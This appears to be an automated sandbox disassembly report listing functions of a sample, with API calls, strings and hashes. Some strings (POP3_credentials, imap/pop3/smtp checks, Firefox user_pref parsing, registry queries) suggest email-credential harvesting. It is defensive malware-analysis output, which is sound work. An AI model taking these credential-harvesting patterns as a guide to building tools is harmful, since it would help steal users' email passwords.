                  Function 00411133 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96stringCOMMON
                  Download Yara Rule
                  APIs
                  • wcslen.MSVCRT ref: 00411146
                  • ??2@YAPAXI@Z.MSVCRT ref: 0041114F
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104C3
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104E1
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104FC
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410525
                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410549
                  • strlen.MSVCRT ref: 004111AB
                    • Part of subcall function 0041061F: ??3@YAXPAX@Z.MSVCRT ref: 0041062A
                    • Part of subcall function 0041061F: ??2@YAPAXI@Z.MSVCRT ref: 00410639
                  • memcpy.MSVCRT ref: 004111C5
                  • ??3@YAXPAX@Z.MSVCRT ref: 00411258
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                  • String ID: <UA
                  • API String ID: 577244452-338107889
                  • Opcode ID: f2f762125e1423e49e6bcb13a5991785930390a1f9f2de13f6984d67d91fd659
                  • Instruction ID: 068040a7654b3252a10ead66c722fc8ae16d1693d490f738ed846916017eff7d
                  • Opcode Fuzzy Hash: f2f762125e1423e49e6bcb13a5991785930390a1f9f2de13f6984d67d91fd659
                  • Instruction Fuzzy Hash: 21314472D04219ABCF21EF65C8809DDBBB5AF49314F0481AAE608A3251CB396FD5CF59
                  Function 00408155 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040817B
                  • GetDlgCtrlID.USER32(?), ref: 00408186
                  • GetWindowTextA.USER32(?,?,00001000), ref: 00408199
                  • memset.MSVCRT ref: 004081BF
                  • GetClassNameA.USER32(?,?,000000FF), ref: 004081D2
                  • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 004081E4
                    • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                  • String ID: sysdatetimepick32
                  • API String ID: 896699463-4169760276
                  • Opcode ID: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                  • Instruction ID: 8ec491919e3a594e32bcc0b3aeb202d37a515ee6f0006301200e52d8450d0196
                  • Opcode Fuzzy Hash: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                  • Instruction Fuzzy Hash: 2311EC7280511C7EE7119B54DD41EEB7BACEF19355F0400BBFA44E2152EA789FC48B68
                  Function 0040571F Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 004057C7
                  • GetDlgItem.USER32(?,000003E9), ref: 004057DA
                  • GetDlgItem.USER32(?,000003E9), ref: 004057EF
                  • GetDlgItem.USER32(?,000003E9), ref: 00405807
                  • EndDialog.USER32(?,00000002), ref: 00405823
                  • EndDialog.USER32(?,00000001), ref: 00405836
                    • Part of subcall function 004054D0: GetDlgItem.USER32(?,000003E9), ref: 004054DE
                    • Part of subcall function 004054D0: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054F3
                    • Part of subcall function 004054D0: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 0040550F
                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 0040584E
                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 0040595A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Item$DialogMessageSend
                  • String ID:
                  • API String ID: 2485852401-0
                  • Opcode ID: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                  • Instruction ID: 327bdf07108b1d48d13abdf232bd1ccce71b7be96730af3de4981d1ea2c32abc
                  • Opcode Fuzzy Hash: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                  • Instruction Fuzzy Hash: 6561C031600A05AFDB25BF25C886A2BB3A5FF40725F00C23EF915A72D1D778A960CF49
                  Function 0040596A Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                  • String ID:
                  • API String ID: 2313361498-0
                  • Opcode ID: 1c45e02bf6d6e0acd6632af5bc3a0aaa414ad192b3bff06ac025739c61ab6296
                  • Instruction ID: c9d5e52e17e49b2fdf2665c470f327c4663aeb176fcf1135955ad165868745cd
                  • Opcode Fuzzy Hash: 1c45e02bf6d6e0acd6632af5bc3a0aaa414ad192b3bff06ac025739c61ab6296
                  • Instruction Fuzzy Hash: 113183B2600601AFDB249F79D985A2AF7A4FB08354710863FF55AD7290DB78AC50CF58
                  Function 0040649B Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                  • GetSystemMetrics.USER32(00000011), ref: 004064AC
                  • GetSystemMetrics.USER32(00000010), ref: 004064B2
                  • GetDC.USER32(00000000), ref: 004064C0
                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064D2
                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004064DB
                  • ReleaseDC.USER32(00000000,004012E4), ref: 004064E4
                  • GetWindowRect.USER32(004012E4,?), ref: 004064F1
                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00406536
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                  • String ID:
                  • API String ID: 1999381814-0
                  • Opcode ID: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                  • Instruction ID: ba7d715333d017d2103329686637bd52cca5eef1020c3fd7483cce7c10731540
                  • Opcode Fuzzy Hash: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                  • Instruction Fuzzy Hash: 1011A232A00219AFDF109FB8DC09BEF7FB9EB44351F054135EE06E3290DA70A9418A90
                  Function 0040B21F Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 162windowCOMMON
                  Download Yara Rule
                  APIs
                  • DestroyWindow.USER32(?), ref: 0040B258
                  • SetFocus.USER32(?,?,?), ref: 0040B2FE
                  • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: DestroyFocusInvalidateRectWindow
                  • String ID: (@A$84A$pEA
                  • API String ID: 3502187192-3946309182
                  • Opcode ID: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                  • Instruction ID: b7bc1b810a9c946c48dae79992a2e7083b23304991c1a6466db7751271d6d75f
                  • Opcode Fuzzy Hash: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                  • Instruction Fuzzy Hash: B75186306047019BCB20BF658845E9AB3E5FF50724F54C53FF8696B2E2C7799A818B8D
                  Function 0040C70B Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpymemset$strlen$_memicmp
                  • String ID: user_pref("
                  • API String ID: 765841271-2487180061
                  • Opcode ID: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
                  • Instruction ID: c71e9d7c33fd880144b5893e014edb1d15ca38a86f0d2a268660e68eb467e50f
                  • Opcode Fuzzy Hash: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
                  • Instruction Fuzzy Hash: 134168769041199ADB14EB95DCC0EDA77AC9F44314F1083BBE605F7181EA389F49CF68
                  Function 00407A69 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                  Download Yara Rule
                  APIs
                  • strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76F90A60), ref: 00407AE4
                    • Part of subcall function 00407EF3: _itoa.MSVCRT ref: 00407F14
                  • strlen.MSVCRT ref: 00407B02
                  • LoadStringA.USER32(00000000,0000000D,00000FFF,?), ref: 00407B32
                  • memcpy.MSVCRT ref: 00407B71
                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A0F
                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A2D
                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A4B
                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A5B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                  • String ID: O4A$strings
                  • API String ID: 1748916193-3524047076
                  • Opcode ID: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                  • Instruction ID: 4e35bd01ad2207757dd6e5c19dba2cefa7e6d732e740aa6e4bc5455c9760af59
                  • Opcode Fuzzy Hash: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                  • Instruction Fuzzy Hash: BA315771A08101AFD7159B58ED80DA63777E744348750807EEC01A72A2DF39BD81CF5E
                  Function 004071D6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004071F7
                    • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,0040738B,?,000000FD,00000000,00000000,?,00000000,0040738B,?,?,?,?,00000000), ref: 00407292
                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,76DBEB20,?), ref: 004072A2
                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                  • String ID: POP3_credentials$POP3_host$POP3_name
                  • API String ID: 604216836-2190619648
                  • Opcode ID: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
                  • Instruction ID: 7a8ee4d7bc4178ad58e78f2f27b608862355488638afca077fa6fa925b8dfb39
                  • Opcode Fuzzy Hash: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
                  • Instruction Fuzzy Hash: D8315075A4025DAFCB11EB69CC81ADE7BBCEB59344F0080B6FA04B3141D6349F598F65
                  Function 00408065 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ItemMenu$CountInfomemsetstrchr
                  • String ID: 0$6
                  • API String ID: 2300387033-3849865405
                  • Opcode ID: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                  • Instruction ID: 51172b8e10bed5c2f97a320ed5cd446e6bfcd9d4694fda0f565c00a2b2434e31
                  • Opcode Fuzzy Hash: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                  • Instruction Fuzzy Hash: 7821D171108384AFC710CF65C981A9BB7E8FF88348F04453EF6C4AA280DB79D955CB5A
                  Function 004044E4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                  • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 00404575
                  • _stricmp.MSVCRT(?,imap), ref: 00404593
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _stricmp$memcpystrlen
                  • String ID: imap$pop3$smtp
                  • API String ID: 445763297-821077329
                  • Opcode ID: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                  • Instruction ID: 5d3aebf2a9f6afee3de7fcc7c39c9e230d3229a718a14b09e3d1f3abdf4e177e
                  • Opcode Fuzzy Hash: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                  • Instruction Fuzzy Hash: 842151B3500318AFD711DB61CD42BDAB7F8AF54304F10056BE649B3181DB787B858B95
                  Function 004036A6 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                    • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                    • Part of subcall function 0040EF77: memcpy.MSVCRT ref: 0040EFD7
                    • Part of subcall function 0040EF77: CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                  • strchr.MSVCRT ref: 004036E0
                  • strcpy.MSVCRT(?,00000001,?,?,?), ref: 00403709
                  • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403719
                  • strlen.MSVCRT ref: 00403739
                  • sprintf.MSVCRT ref: 0040375D
                  • strcpy.MSVCRT(?,?), ref: 00403773
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                  • String ID: %s@gmail.com
                  • API String ID: 2649369358-4097000612
                  • Opcode ID: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                  • Instruction ID: 644cd556ee9d6f83430fbc5f755ed5fad511d56830514e9de795baf2bfcfc341
                  • Opcode Fuzzy Hash: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                  • Instruction Fuzzy Hash: 8B21DEF280411D5EDB21DB54CD85FDA77ACBB14308F0401AFF609E2181EAB89BC48B69
                  Function 0040687C Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpystrlen$memsetsprintf
                  • String ID: %s (%s)
                  • API String ID: 3756086014-1363028141
                  • Opcode ID: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                  • Instruction ID: 724a4194cae70d0bf31fff2aa5a30eca349b7c3c60a55174e1cb3006c7faee74
                  • Opcode Fuzzy Hash: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                  • Instruction Fuzzy Hash: 2F1190B2800159AFDB21DF58CD44BDABBACEF45308F00856AFB48EB102D275EA55CB94
                  Function 0040EF77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                  • memcpy.MSVCRT ref: 0040EFD7
                  • CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                  Strings
                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040EF89
                  • 00000000-0000-0000-0000-000000000000, xrefs: 0040EF96
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FromStringUuid$FreeTaskmemcpy
                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                  • API String ID: 1640410171-3316789007
                  • Opcode ID: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                  • Instruction ID: e50974e3e7746184743268e00a497f96c507105008b10ce8b40323224852ed78
                  • Opcode Fuzzy Hash: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                  • Instruction Fuzzy Hash: A501807691012EBACF11AAA5CD40EEF7BACEF48354F004437FD15E7141E634EA548BA4
                  Function 00409F9C Relevance: 10.5, APIs: 7, Instructions: 43windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A175: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
                    • Part of subcall function 0040A175: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                  • LoadIconA.USER32(000000CE), ref: 00409FE7
                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                  • LoadIconA.USER32(000000CF), ref: 0040A005
                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                  • SendMessageA.USER32(?,00001003,00000002,?), ref: 0040A025
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                  • String ID:
                  • API String ID: 3673709545-0
                  • Opcode ID: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                  • Instruction ID: 4e57101e09f8a627107abf71349708af879b5e1eab1c783dad4143a9e5363d44
                  • Opcode Fuzzy Hash: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                  • Instruction Fuzzy Hash: 3101EC71280704BFFA316B60DE4BFD67AA6EB48B05F004425F359690E1C7F56D51DB18
                  Function 00409F9D Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A175: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
                    • Part of subcall function 0040A175: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                  • LoadIconA.USER32(000000CE), ref: 00409FE7
                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                  • LoadIconA.USER32(000000CF), ref: 0040A005
                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                  • SendMessageA.USER32(?,00001003,00000002,?), ref: 0040A025
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
